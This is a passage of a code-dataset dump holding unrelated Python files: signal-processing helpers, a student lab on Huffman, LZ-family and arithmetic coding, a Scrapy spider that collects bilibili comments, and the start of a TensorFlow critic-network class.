wave.\"\"\"\n \n total_duration = np.sum([sym_duration*num_symbols[idx] for idx, sym_duration in enumerate(time_interval_list)])\n # total_duration = np.sum(time_interval_list)\n total_number_of_points = int(total_duration/time_step)\n all_zeros = np.zeros(total_number_of_points)\n\n printDebug(total_duration)\n\n out_wave = all_zeros.copy()*(0+0j)\n \n number_of_points = 0\n for idx,data in enumerate(signal_list):\n\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy()*(0+0j), data)\n \n # plotDebug(new_data, np.arange(0, len(new_data))*time_step)\n new_data = np.roll(new_data, number_of_points)\n # plotDebug(new_data, np.arange(0, len(new_data))*time_step)\n\n # current data number of points\n number_of_points += int(time_interval_list[idx]*num_symbols[idx]/time_step)\n\n out_wave = sumVectosDiffSizes(out_wave, new_data)\n out_wave_time = np.arange(0, len(out_wave))*time_step\n \n return out_wave, out_wave_time\n\ndef butterFilter(data, cuttof, filter_order = 20, filter_type = 'low', plot = False):\n \"\"\"Apply Butterworth filter.\"\"\"\n\n DEBUG = False\n # DEBUG = True\n\n # nyquist frequency\n nyq = 0.5 * Global.simul_frequency\n\n # adjsut cuttof frequency\n if isinstance(cuttof, list):\n cuttof_nyq = []\n cuttof_nyq[0] = 
cuttof[0] / nyq\n cuttof_nyq[1] = cuttof[1] / nyq\n else:\n cuttof_nyq = cuttof / nyq\n\n # data time frame\n number_points = len(data)\n time_frame = number_points*Global.time_step\n\n number_samples = int(Global.simul_frequency*time_frame)\n \n t = np.linspace(0, time_frame, number_samples, False)\n \n if DEBUG:\n # For testing\n f0 = 10e6\n f1 = 40e6\n data = np.sin(2*np.pi*f0*t) + np.sin(2*np.pi*f1*t)\n # data = np.sin(2*np.pi*f0*t)\n \n if plot:\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n ax1.plot(t, data)\n ax1.set_title('Time domain signal')\n ax1.grid()\n\n # Create filter\n sos = signal.butter(filter_order, cuttof_nyq, btype=filter_type, output='sos')\n\n # yf = fftpack.fft(data)\n # xf = np.linspace(0.0, 1.0/(2.0*time_frame), int(number_samples/2))\n\n # fig, ax = plt.subplots()\n # ax.plot(xf, 2.0/number_samples * np.abs(yf[:number_samples//2]))\n # plt.show()\n\n\n # filtered signal\n filtered = signal.sosfilt(sos, data)\n\n # get filter frequency and absolute value\n w, h = signal.sosfreqz(sos, worN=number_points)\n \n if plot:\n ax2.plot(t, filtered)\n ax2.set_title('Filtered signal.')\n # ax2.axis([0, 1, -2, 2])\n ax2.set_xlabel('Time [seconds]')\n plt.tight_layout()\n ax2.grid()\n plt.show()\n\n plt.semilogx((Global.simul_frequency * 0.5 / np.pi) * w, 20 * np.log10(abs(h)))\n\n plt.title('Butterworth filter frequency response')\n plt.xlabel('Frequency [radians / second]')\n plt.ylabel('Amplitude [dB]')\n plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n plt.axvline(cuttof, color='green') # cutoff frequency\n # plt.grid()\n plt.show()\n\n # plotBode(data, time_frame, number_samples, cuttof, data2=filtered)\n plotBode(data, t, number_samples, cuttof, data2=filtered)\n \n return filtered\n\ndef plotBode(data, time, freq_ref, data2 = None, time2 = None):\n\n time_frame = np.max(time)\n number_samples = len(time)\n \n \"\"\"Inrerpolate data to be in conformity with time vector.\"\"\"\n yf = fftpack.fft(data)\n xf = np.linspace(0.0, 1.0/(2.0*time_frame), int(number_samples/2))\n if data2 is not None:\n yf2 = fftpack.fft(data2)\n if time2 is not None:\n time_frame2 = np.max(time2)\n number_samples2 = len(time2)\n else:\n time_frame2 = time_frame\n number_samples2 = number_samples\n xf2 = np.linspace(0.0, 1.0/(2.0*time_frame2), int(number_samples2/2))\n \n # plt.semilogx((Global.simul_frequency * 1 / np.pi) * w, 20 * np.log10(abs(yf)))\n plt.semilogx(xf*0.5, 20 * np.log10(abs(2.0/number_samples * np.abs(yf[:number_samples//2]))))\n if data2 is not None:\n plt.semilogx(xf2*0.5, 20 * np.log10(abs(2.0/number_samples2 * np.abs(yf2[:number_samples2//2]))))\n\n plt.title('Frequency response')\n plt.xlabel('Frequency [radians / second]')\n plt.ylabel('Amplitude [dB]')\n if data2 is not None:\n plt.legend(['data1', 'data2'], fontsize=10)\n else:\n plt.legend(['data'], fontsize=10)\n # plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n printDebug(freq_ref)\n plt.axvline(freq_ref, color='green') # cutoff frequency\n plt.show()\n\ndef interpolateData(time, signal, number_of_points, kind = 'linear'):\n \"\"\"Inrerpolate data to be in conformity with time vector.\"\"\"\n \n kind = Global.interpolation_type\n tx_interp = interpolate.interp1d(time, signal, kind=kind, fill_value=\"extrapolate\")\n\n base_time_vector = np.arange(0, number_of_points)*Global.time_step\n\n # printDebug(tx_interp(Global.base_time_vector))\n # plotDebug(tx_interp(Global.base_time_vector), Global.base_time_vector, symbols='b-')\n return tx_interp(base_time_vector)\n \n\ndef plotDebug(signal, 
time = None, label = \"\", symbols='r-', hold = False, title = None):\n \"\"\"Fast plot for debug.\"\"\"\n\n if label == \"\":\n # Get function call\n function_call = inspect.stack()[1][-2][0].strip()\n # Extract function name\n func_name = function_call.split('(')[0]\n # Extract \n label = function_call.split(func_name)[1].split(',')[0]\n if label[0] == '(':\n label = label[1:]\n if label[-1] == ')':\n label = label[:-1]\n # replace('(','').replace(')','').split(',')[0]\n \n if time is None:\n plt.plot(signal, symbols, label=label)\n else:\n plt.plot(time, signal, symbols, label=label)\n plt.grid(True)\n # plt.ylim(np.min(signal)*1.1, np.max(signal)*1.1)\n plt.legend(fontsize=10)\n if title is not None:\n plt.title(title)\n if not hold:\n plt.show()\n\ndef printDebug(signal = None, details = False, plot = False, stop = False, stop_message = \"\"):\n \"\"\"Pretty debug signal print. Use details = True for more information on the object. Use stop = True to stop program after print.\"\"\"\n\n print('\\n---------------------------------------------------------------------------')\n\n if signal is None and stop:\n raise ValueError(f\"\\n\\n***User called printDebug() to stop execution!\\n\")\n \n if signal is None:\n raise ValueError(f\"\\n\\n***'None' signal passed to printDebug()!\\n\")\n \n # Get function call\n function_call = inspect.stack()[1][-2][0].strip()\n # Extract function name\n func_name = function_call.split('(')[0]\n # Extract \n signal_name = function_call.split(func_name)[1].split(',')[0]\n if signal_name[0] == '(':\n signal_name = signal_name[1:]\n if signal_name[-1] == ')':\n signal_name = signal_name[:-1]\n # replace('(','').replace(')','').split(',')[0]\n \n print('> START <' + f\"\\t-->\\t<{signal_name}>\")\n # Actual print with value\n print(f\"{type(signal)}\")\n try:\n print(f\"length = {len(signal)}\")\n except:\n pass\n print(f\"Value :\\n{signal}\")\n \n if details:\n print('\\n>>> More details <<<\\n')\n print(f\">> All methods for {type(signal)}:\")\n print(f\"{dir(signal)}\")\n \n if plot:\n plotDebug(signal, label = signal_name)\n\n print(f\"{type(signal)}\")\n try:\n print(f\"length = {len(signal)}\")\n except:\n pass\n print('> END <' + f\"\\t-->\\t<{signal_name}>\")\n print('---------------------------------------------------------------------------\\n')\n\n if stop or stop_message != \"\":\n if stop_message != \"\":\n raise ValueError(f\"\\n\\n***User called printDebug() to stop execution!\\n\")\n else:\n raise ValueError(stop_message)\n\ndef adjustRange(signal, new_max, new_min, old_max, old_min, offset):\n \"\"\"Adjust signal to some new range.\"\"\"\n \n return (new_max - (new_min))/(old_max - old_min)\\\n *(signal - old_min) + (new_min) + (offset)\n # return (new_max - (new_min + offset))/(old_max - old_min)\\\n # *(signal - old_min) + (new_min + offset)\n\ndef zeroClip(signal):\n \"\"\"Returns the same signal, but clipped to zero\"\"\"\n \n return np.array([item if item >= 0 else 0 for item in signal])\n\ndef plotTxRxData(data, time, label, handle, sync_obj, show = False):\n \"\"\"Plots Tx/Rx data.\"\"\"\n \n sync_obj.appendToSimulationPath(\"plotTxRxData @ generalLibrary\")\n \n # Set previous for debug\n sync_obj.setPrevious(\"generalLibrary\")\n \n # plt.figure(figsize=(8,2))\n plt.plot(time, data, label=label)\n # plt.plot(time, data, 'bo-', label=label)\n # plt.plot((np.fft.ifft(data)), label=label)\n plt.legend(fontsize=10)\n plt.xlabel('Time'); plt.ylabel('$|x(t)|$')\n plt.grid(True)\n plt.show(show)\n\ndef removeOutliers(signal, sigma_threshold 
= 6, default_outlier = 0):\n \"\"\"Get signal, find outliers, and remove\"\"\"\n\n # get std\n signal_std = np.std(signal)\n\n # find outliers\n outliers = abs(signal) > sigma_threshold*signal_std\n\n printDebug(outliers)\n\n # remove the outliers, settinf to default value\n signal[outliers] = default_outlier\n\n # get outlier positions\n outlier_positions = [index for index, out in enumerate(outliers) if out]\n \n\n return signal, outlier_positions\n\ndef sumVectosDiffSizes(a, b):\n \"\"\"Sum vectors with different sizes: c = a + b.\"\"\"\n\n if len(a) < len(b):\n c = b.copy()\n c[:len(a)] = c[:len(a)] + a\n else:\n c = a.copy()\n c[:len(b)] = c[:len(b)] + b\n \n return c\n\ndef mulVectosDiffSizes(a, b, shift = 0):\n \"\"\"Multiply vectors with different sizes: c = a * b. Shift smaller by shift positions.\"\"\"\n\n if len(a) < len(b):\n a = np.roll(sumVectosDiffSizes(b.copy()*0, a), shift)\n c = a*b\n else:\n b = np.roll(sumVectosDiffSizes(a.copy()*0, b), shift)\n c = a*b\n \n return c\n\n\n# def plotTxRxDataList(data_list, time_list, label, handle, sync_obj, show = False):\ndef plotTxRxDataList(data_list, label, handle, sync_obj, show = False):\n \"\"\"Plots Tx/Rx data list.\"\"\"\n \n sync_obj.appendToSimulationPath(\"plotTxRxDataList @ generalLibrary\")\n \n # Set previous for debug\n sync_obj.setPrevious(\"generalLibrary\")\n \n shift = 0\n # concatenated_data = []\n # concatenated_data = 0\n # final_data = np.zeros((1+len(data_list))*Global.number_of_points)\n # final_data = np.zeros((1+len(data_list))*Global.number_of_points)\n all_zeros = np.zeros((1+len(data_list))*Global.number_of_points)\n final_data = all_zeros.copy()\n for data in data_list:\n # new_data = data\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy(), data)\n if shift >= 0:\n shift += 1\n new_data = np.roll(new_data, (shift-1)*Global.number_of_points)\n # elif shift > 1:\n # # new_data = np.roll(data, Global.number_of_points)\n # # shifts data to \n # shift += 1\n # # new_data = np.roll(new_data, 100)\n # pass\n \n # new_data = sumVectosDiffSizes(all_zeros.copy(), new_data)\n\n final_data = sumVectosDiffSizes(final_data, new_data)\n\n # concatenated_data += list(new_data)\n # # concatenated_data = concatenated_data + new_data\n printDebug(Global.number_of_points)\n # printDebug(Global.number_of_points*2)\n # # printDebug(new_data)\n # # plotDebug(new_data)\n # plotDebug(final_data)\n\n # interpolateData\n # plotDebug(concatenated_data)\n \n # concatenated_time = []\n # for idx,data in enumerate(data_list):\n # concatenated_time += list(Global.base_time_vector + idx*Global.time_frame)\n \n # concatenated_data = np.array(final_data)\n # concatenated_time = np.array(concatenated_time)\n\n concatenated_time = np.arange(0, len(final_data))*Global.time_step\n # plotDebug(final_data, concatenated_time)\n \n # plot concatenated list\n plotTxRxData(\n data = final_data,\n time = concatenated_time,\n label = label,\n handle = handle,\n sync_obj = sync_obj,\n show = show\n )\n \ndef timer_dec(function):\n \"\"\"Function to be used as decorator, for method timing calculations.\"\"\"\n def timed_function(self, *args, **kw):\n start_time = timer()\n result = function(self, *args, **kw)\n elapsed = timer() - start_time\n print(f'>>>> Function \"{function.__name__} (@ {self.__class__.__name__})\" took {elapsed} seconds to complete.\\n')\n \n return result\n return timed_function\n\ndef sync_track(function):\n \"\"\"Function to be used as decorator, for SimulationSync object simulation 
path tracking.\"\"\"\n def synced_function(self, *args, **kw):\n \n # curframe = inspect.currentframe()\n # calframe = inspect.getouterframes(curframe, 2)\n # # print('curframe:', curframe)\n # print('caller name:', calframe[1][3])\n \n # Get sync object\n sync_obj = self.__class__.getSyncObj(self)\n \n # If NO debug i set\n if not sync_obj.DEBUG[\"all\"] and not sync_obj.DEBUG[\"SimulationSync\"]:\n \n # apply function, and get result (with no DEBUG)\n result = function(self, *args, **kw)\n return result\n \n \n frame = inspect.stack()[1]\n module = inspect.getmodule(frame[0])\n # filename = module.__file__\n module_name = module.__name__\n \n \n # Set previous for debug\n sync_obj.setPrevious(f\"{module_name}\")\n # sync_obj.setPrevious(f\"{self.__class__.__name__}\")\n \n # SUPPORTS ONLY TWO NESTED DECORATORS!\n # Check if function name is one of the inner functions for decorators\n if function.__name__ in [\"timed_function\"]:\n # print()\n # print(function.__name__)\n # # print(frame.function)\n # print(frame.code_context)\n # print(frame.code_context[0].strip().replace(\"\\n\",\"\").split('.')[-1])\n \n # Add function, called from within a decorator\n function_from_decorator = frame.code_context[0].strip().replace(\"\\n\",\"\").split(\".\")[-1]\n sync_obj.appendToSimulationPath(f'{self.__class__.__name__}.{function_from_decorator} -- @{function.__name__}')\n \n else:\n # Add function, called from given class\n sync_obj.appendToSimulationPath(f\"{self.__class__.__name__}.{function.__name__}()\")\n \n \n # Set sync object\n self.__class__.setSyncObj(self, sync_obj)\n \n # # Print whole simul path\n # print(sync_obj.getSimulationPath())\n \n # apply function, and get result\n result = function(self, *args, **kw)\n \n return result\n \n return synced_function\n\n\n# def for_all_methods(decorator):\n# def decorate(my_class):\n# for attribute in my_class.__dict__:\n# if attribute not in ['getSyncObj', 'setSyncObj', '__init__'] and callable(getattr(my_class, attribute)):\n# print(attribute)\n# # print(f\"{[my_class, attribute, decorator(getattr(my_class, attribute))]}\")\n# setattr(my_class, f\"self.{attribute}\", decorator(getattr(my_class, attribute)))\n# return my_class\n# return decorate\n\n# # Got from \"https://www.idtools.com.au/gpu-accelerated-fft-compatible-numpy/\"\n# def ifft2_gpu(y, fftshift=False):\n# ''' This function produce an output that is \n# compatible with numpy.fft.ifft2\n# The input y is a 2D complex numpy array'''\n \n# # Get the shape of the initial numpy array\n# n1, n2 = y.shape\n \n# # From numpy array to GPUarray. 
Take only the first n2/2+1 non redundant FFT coefficients\n# if fftshift is False:\n# y2 = np.asarray(y[:,0:n2//2 + 1], np.complex64)\n# else:\n# y2 = np.asarray(np.fft.ifftshift(y)[:,:n2//2+1], np.complex64)\n# ygpu = gpuarray.to_gpu(y2)\n \n# # Initialise empty output GPUarray \n# x = gpuarray.empty((n1,n2), np.float32)\n \n# # Inverse FFT\n# plan_backward = cu_fft.Plan((n1, n2), np.complex64, np.float32)\n# cu_fft.ifft(ygpu, x, plan_backward)\n \n# # Must divide by the total number of pixels in the image to get the normalisation right\n# xout = x.get()/n1/n2\n \n# return xout\n\n","sub_path":"VLC_devel/build/lib/vlcPhy/generalLibrary.py","file_name":"generalLibrary.py","file_ext":"py","file_size_in_byte":18995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"622943185","text":"from math import *\r\n\r\n\r\nclass HaffmanNode:\r\n def __init__(self, isLeaf, frequency, zeroNode = None, oneNode = None, let = None):\r\n self.IsLeaf = isLeaf\r\n self.Frequency = frequency\r\n self.ZeroNode = zeroNode\r\n self.OneNode = oneNode\r\n self.Letter = let\r\n\r\n\r\nclass LZ77Node:\r\n def __init__(self, offset, length, next):\r\n self.Offset = offset\r\n self.Length = length\r\n self.Next = next\r\n\r\n def __str__(self):\r\n return '<' + str(self.Offset) + ',' + str(self.Length) + ',' + str(self.Next) + '>'\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def str__lzss(self):\r\n if self.Next != '$':\r\n return '<0,' + str(self.Next) + '>'\r\n else:\r\n return '<' + str(self.Offset) + ',' + str(self.Length) + '>'\r\n\r\n\r\nclass LZ78Node:\r\n def __init__(self, pos, next):\r\n self.Pos = pos\r\n self.Next = next\r\n\r\n def __str__(self):\r\n return '<' + str(self.Pos) + ',' + str(self.Next) + '>'\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n\r\ns1 = 'ХАААХВХХХА'\r\ns2 = 'BBACDAABCA'\r\ns3 = 'ЛИМОНАД ЛИМОННЫЙ'\r\ndictsize = 8\r\nbuffersize = 6\r\nfrequences = []\r\nstep = 1.0 / len(s1)\r\n\r\n\r\ndef get_frequency(s: str):\r\n answer = {}\r\n step = 1.0 / len(s)\r\n for i in s:\r\n if i in answer:\r\n answer[i] += step\r\n else:\r\n answer[i] = step\r\n return answer\r\n\r\n\r\ndef get_ariphmetic_foundation(s: str):\r\n fr = get_frequency(s)\r\n prev = 0.0\r\n lst = []\r\n for i in fr:\r\n freq = fr[i]\r\n lst.append((prev, prev + freq, i))\r\n prev += freq\r\n\r\n return lst\r\n\r\n\r\nfor letter in s1:\r\n f = False\r\n for it in range(len(frequences)):\r\n if frequences[it][0] == letter:\r\n frequences[it][1] += step\r\n f = True\r\n break\r\n if not f:\r\n frequences.append([letter, step])\r\n\r\nfrequencesblock = []\r\nstepblock = 2.0 / (len(s1))\r\n\r\nfor i in range(1, len(s1), 2):\r\n key = s1[i - 1] + s1[i]\r\n f = False\r\n for it in range(len(frequencesblock)):\r\n if frequencesblock[it][0] == key:\r\n frequencesblock[it][1] += stepblock\r\n f = True\r\n break\r\n if not f:\r\n frequencesblock.append([key, step])\r\n\r\ndef get_entropy(dict1):\r\n answer = 0.0\r\n for it in dict1:\r\n answer -= it[1] * log2(it[1])\r\n return answer\r\n\r\n\r\ndef get_average_elementary(dict1):\r\n answer = 0.0\r\n divisor = 0\r\n for it in dict1:\r\n answer += len(dict1[it])\r\n divisor += len(it)\r\n answer /= divisor\r\n return answer\r\n\r\n\r\ndef get_haffman_tree(lst):\r\n answer = []\r\n for it in lst:\r\n answer.append(HaffmanNode(True, it[1], let=it[0]))\r\n while len(answer) > 1:\r\n sorted(answer, key=lambda node: node.Frequency)\r\n answer.append(HaffmanNode(False, answer[0].Frequency + answer[1].Frequency, 
zeroNode=answer[0], oneNode=answer[1]))\r\n answer.remove(answer[1])\r\n answer.remove(answer[0])\r\n return answer[0]\r\n\r\n\r\ndef DFS(v, prefix, keys):\r\n if v.IsLeaf:\r\n keys[v.Letter] = prefix\r\n return\r\n DFS(v.OneNode, prefix + '0', keys)\r\n DFS(v.ZeroNode, prefix + '1', keys)\r\n\r\n\r\ndef get_haffman_code(lst):\r\n root = get_haffman_tree(lst)\r\n keys = {}\r\n DFS(root, \"\", keys)\r\n return keys\r\n\r\n\r\nhc = get_haffman_code(frequences)\r\nhcb = get_haffman_code(frequencesblock)\r\nprint(hc)\r\nprint(hcb)\r\nprint(\"Энтропия : \" + str(round(get_entropy(frequences), 4)))\r\nprint(\"Среднее количество элементарных символов метод Хаффмана : \" + str(round(get_average_elementary(hc), 4)))\r\nprint(\"Среднее количество элементарных символов блочный метод Хаффмана : \" + str(round(get_average_elementary(hcb), 4)))\r\n\r\n\r\ndef get_haffman_adapt_code(s):\r\n answer = {}\r\n for i in s:\r\n if not answer.__contains__(i):\r\n answer[i] = 0\r\n answer[i] += 1\r\n lst = []\r\n for i in answer:\r\n lst.append((answer[i], i))\r\n sorted(lst, key=lambda x: x[0])\r\n haffman_code = {}\r\n prefix = ''\r\n for i in lst:\r\n haffman_code[i[1]] = prefix + '0'\r\n prefix += '1'\r\n return haffman_code\r\n\r\n\r\nhac = get_haffman_adapt_code(s2)\r\nprint(\"Адаптивный код Хаффмана:\")\r\nprint(hac)\r\nprint(\"Среднее количество элементарных символов адаптивный метод Хаффмана : \" + str(round(get_average_elementary(hac), 4)))\r\n\r\nprint(\"Адаптивный хаффман декодирование : мсиммпа\")\r\n\r\n\r\ndef encode_lz77(s):\r\n window = \"\"\r\n n = 0\r\n answer = []\r\n windowsize = 8\r\n\r\n while n < len(s):\r\n maxl = 0\r\n crt = (n, 0)\r\n for i in range(len(window)):\r\n for j in range(min(len(s) - 1 - n, len(window))):\r\n if window[i:i + j + 1] == s[n:n + j + 1] and j + 1 > maxl:\r\n maxl = j + 1\r\n crt = (i, j)\r\n answer.append(LZ77Node(n - crt[0], maxl, s[n + crt[1]]))\r\n n += crt[1] + 1\r\n window = s[max(0, n - windowsize):n]\r\n return answer\r\n\r\n\r\ndef decode_lz77(encoded):\r\n answer = ''\r\n for node in encoded:\r\n if node.Length > 0:\r\n start = len(answer) - node.Offset - 1\r\n answer += answer[start:start + node.Length]\r\n answer += node.Next\r\n return answer\r\n\r\n\r\nlz77pr = [\r\n LZ77Node(0, 0, 'м'),\r\n LZ77Node(0, 0, 'я'),\r\n LZ77Node(0, 0, 'т'),\r\n LZ77Node(0, 0, 'а'),\r\n LZ77Node(0, 0, ' '),\r\n LZ77Node(4, 3, 'ы'),\r\n LZ77Node(0, 0, 'й'),\r\n LZ77Node(5, 3, 'с'),\r\n LZ77Node(0, 0, 'о'),\r\n LZ77Node(4, 2, 'у'),\r\n LZ77Node(0, 0, 'к'),\r\n LZ77Node(0, 0, 'а')]\r\n\r\n\r\ntmp = encode_lz77(s3)\r\nprint(\"LZ77 кодирование\" + str(tmp))\r\nprint(\"LZ77 декодирование: \" + decode_lz77(lz77pr))\r\n\r\n\r\ndef LZ78Decode(encoded):\r\n ans = ''\r\n dict1 = [\"\"]\r\n for node in encoded:\r\n word = dict1[node.Pos] + node.Next\r\n ans += word\r\n dict1.append(word)\r\n return ans\r\n\r\n\r\ndef LZ78Encode(s):\r\n buffer = \"\"\r\n dictionary = {'': 0}\r\n ans = []\r\n for i in range(len(s) - 1):\r\n if buffer + s[i] in dictionary:\r\n buffer += s[i]\r\n else:\r\n ans.append(LZ78Node(dictionary[buffer], s[i]))\r\n dictionary[buffer + s[i]] = len(dictionary)\r\n buffer = \"\"\r\n\r\n i += 1\r\n ans.append(LZ78Node(dictionary[buffer], s[i]))\r\n return ans\r\n\r\n\r\ntmp = LZ78Encode(s3)\r\nprint(\"LZ78 кодирование \" + str(LZ78Encode(s3)))\r\nprint(\"LZ78 декодирование \" + str(LZ78Decode(tmp)))\r\n\r\n\r\ndef encode_lzss(s):\r\n window = \"\"\r\n n = 0\r\n answer = []\r\n windowsize = 8\r\n\r\n while n < len(s):\r\n maxl = 0\r\n crt = (n, 0)\r\n for i in 
range(len(window)):\r\n for j in range(min(len(s) - 1 - n, len(window))):\r\n if window[i:i + j + 1] == s[n:n + j + 1] and j + 1 >= maxl:\r\n maxl = j + 1\r\n crt = (i, j)\r\n if crt != (n, 0):\r\n answer.append(LZ77Node(len(window) - crt[0], maxl, '$'))\r\n else:\r\n answer.append(LZ77Node(0, 0, s[n]))\r\n n += crt[1] + 1\r\n window = s[max(0, n - windowsize):n]\r\n return answer\r\n\r\n\r\ndef decode_lzss(encoded):\r\n answer = ''\r\n for node in encoded:\r\n if node.Next == '$':\r\n start = len(answer) - node.Offset\r\n answer += answer[start:start + node.Length]\r\n else:\r\n answer += node.Next\r\n return answer\r\n\r\n\r\ntmp = encode_lzss(s3)\r\nt1 = []\r\nfor i in range(len(tmp)):\r\n t1.append(tmp[i].str__lzss())\r\nprint('LZSS кодирование ' + str(list(t1)))\r\nprint('LZSS декодирование ' + str(decode_lzss(tmp)))\r\nlzsspr = [\r\n LZ77Node(0, 0, 'м'),\r\n LZ77Node(0, 0, 'a'),\r\n LZ77Node(0, 0, 'ш'),\r\n LZ77Node(0, 0, 'и'),\r\n LZ77Node(0, 0, 'н'),\r\n LZ77Node(4, 1, '$'),\r\n LZ77Node(0, 0, ' '),\r\n LZ77Node(5, 5, '$'),\r\n LZ77Node(0, 0, 'к'),\r\n LZ77Node(0, 0, 'у'),\r\n LZ77Node(0, 0, 'в'),\r\n LZ77Node(8, 3, '$')\r\n]\r\nprint('LZSS декодирование ' + str(decode_lzss(lzsspr)))\r\n\r\n\r\nfrequences = get_frequency(s2)\r\n\r\n\r\ndef ariphmetic_coding(s: str):\r\n keys = get_ariphmetic_foundation(s)\r\n\r\n answer = 0.0\r\n step = 1.0\r\n\r\n for i in s:\r\n for j in keys:\r\n if j[2] == i:\r\n answer += step * j[0]\r\n step *= (j[1] - j[0])\r\n break\r\n return answer + step / 2\r\n\r\n\r\ndef ariphmetic_decoding(keys, length, count):\r\n answer = \"\"\r\n ans = 0.0\r\n step = 1.0\r\n for i in range(length):\r\n for j in keys:\r\n if ans + j[0] * step < count < ans + j[1] * step:\r\n answer += j[2]\r\n ans += step * j[0]\r\n step *= (j[1] - j[0])\r\n break\r\n return answer\r\n\r\n\r\ntmp = ariphmetic_coding(s2)\r\nprint(s2)\r\nprint(\"Арифметическое кодирование \" + str(tmp))\r\nprint(\"Расшифровка \" + ariphmetic_decoding(get_ariphmetic_foundation(s2), len(s2), tmp))\r\n","sub_path":"ТИ/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109120897","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re,logging\nfrom bilibili.items import BilibiliItem\n\nheaders = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\",\n 'Referer':'https://bilibili.com'}\n\nclass BilibilisSpider(scrapy.Spider):\n name = \"bilibilis\"\n allowed_domains = [\"bilibili.com\"]\n start_urls = (\n 'http://www.bilibili.com/',\n )\n\n def start_requests(self):\n url = 'http://bangumi.bilibili.com/api/timeline_v2'\n yield scrapy.Request(url,headers=headers,callback=self.a_parse)\n\n def a_parse(self,response):\n session_id_list = re.findall(r'\"season_id\":(.*?),\"season_status\"', response.text)\n title_list = re.findall(r'\"title\":\"(.*?)\",\"url\"',response.text)\n for session_id,title in zip(session_id_list, title_list):\n b_url = 'http://bangumi.bilibili.com/anime/'+ session_id\n yield scrapy.Request(b_url,headers=headers,callback=self.b_parse, meta={\"title\":title})\n\n def b_parse(self,response):\n episode_id_list = re.findall(r'data-episode-id=\"(.*?)\"',response.text)\n title= response.meta[\"title\"]\n tit_episode_list = re.findall(r'',response.text)\n for episode_id, tit_episode in zip(episode_id_list, tit_episode_list):\n c_url = 'http://bangumi.bilibili.com/web_api/get_source'\n 
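# POST each episode id to the get_source endpoint; c_parse pulls the comment cid out of the reply.\n            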
    def c_parse(self, response):\n        title = response.meta[\"title\"]\n        tit_episode = response.meta[\"tit_episode\"]\n        cid = re.findall(r'\"cid\":(.*?),',response.text)[0]\n        d_url = 'http://comment.bilibili.com/{}.xml?html5=1'.format(cid)\n        yield scrapy.Request(d_url,headers=headers,callback=self.d_parse,meta={\"title\":title,\"tit_episode\":tit_episode})\n\n    def d_parse(self,response):\n        item = BilibiliItem()\n        comment_list = re.findall(r'<d p=\".*?\">(.*?)</d>',response.text)\n        for comment in comment_list:\n            item['title']=response.meta['title']\n            item['comment'] = comment\n            item['tit_episode'] = response.meta['tit_episode']\n            yield item\n\n\n\n","sub_path":"bilibili/bilibili/spiders/bilibilis.py","file_name":"bilibilis.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153907218","text":"\"\"\" Model of Critic Network\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nfrom tensorflow.contrib import layers\nfrom utils import DataFactory\nimport Libs as libs\n\n\nclass C_MODEL(object):\n    \"\"\" Model of Critic Network\n    \"\"\"\n\n    def __init__(self, config, graph, if_training=True):\n        \"\"\" Build up the graph\n        Inputs\n        ------\n        config :\n            * batch_size : mini batch size\n            * log_dir : path to save training summary\n            * learning_rate : adam's learning rate\n            * seq_length : length of sequence during training\n            * penalty_lambda : gradient penalty's weight, ref from paper 'improved-wgan'\n            * n_resblock : number of resblocks in the network body\n            * if_handcraft_features : if_handcraft_features\n            * residual_alpha : residual block = F(x) * residual_alpha + x\n            * leaky_relu_alpha : tf.maximum(x, leaky_relu_alpha * x)\n            * openshot_penalty_lambda : Critic = Critic - openshot_penalty_lambda * open_shot_score\n            * if_use_mismatched : if True, negative scores = mean of (fake_scores + mismatched_scores)\n            * n_filters : number of filters in all ConV\n        graph :\n            tensorflow default graph\n        \"\"\"\n        self.data_factory = DataFactory()\n        # hyper-parameters\n        self.batch_size = config.batch_size\n        self.log_dir = config.log_dir\n        self.learning_rate = config.learning_rate\n        self.seq_length = config.seq_length\n        self.penalty_lambda = config.penalty_lambda\n        self.n_resblock = config.n_resblock\n        self.if_handcraft_features = config.if_handcraft_features\n        self.residual_alpha = config.residual_alpha\n        self.leaky_relu_alpha = config.leaky_relu_alpha\n        self.openshot_penalty_lambda = config.openshot_penalty_lambda\n        self.if_use_mismatched = config.if_use_mismatched\n        self.n_filters = config.n_filters\n        self.if_training = if_training\n\n        # steps\n        self.__global_steps = tf.train.get_or_create_global_step(graph=graph)\n        with tf.name_scope('Critic'):\n            self.__steps = tf.get_variable('C_steps', shape=[\n            ], dtype=tf.int32, initializer=tf.zeros_initializer(dtype=tf.int32), trainable=False)\n            # data\n            self.__G_samples = tf.placeholder(dtype=tf.float32, shape=[\n                None, None, 10], name='G_samples')\n            self.__real_data = tf.placeholder(dtype=tf.float32, shape=[\n                None, None, 10], name='real_data')\n            self.__matched_cond = tf.placeholder(dtype=tf.float32, shape=[\n                None, None, 13], name='matched_cond')\n            
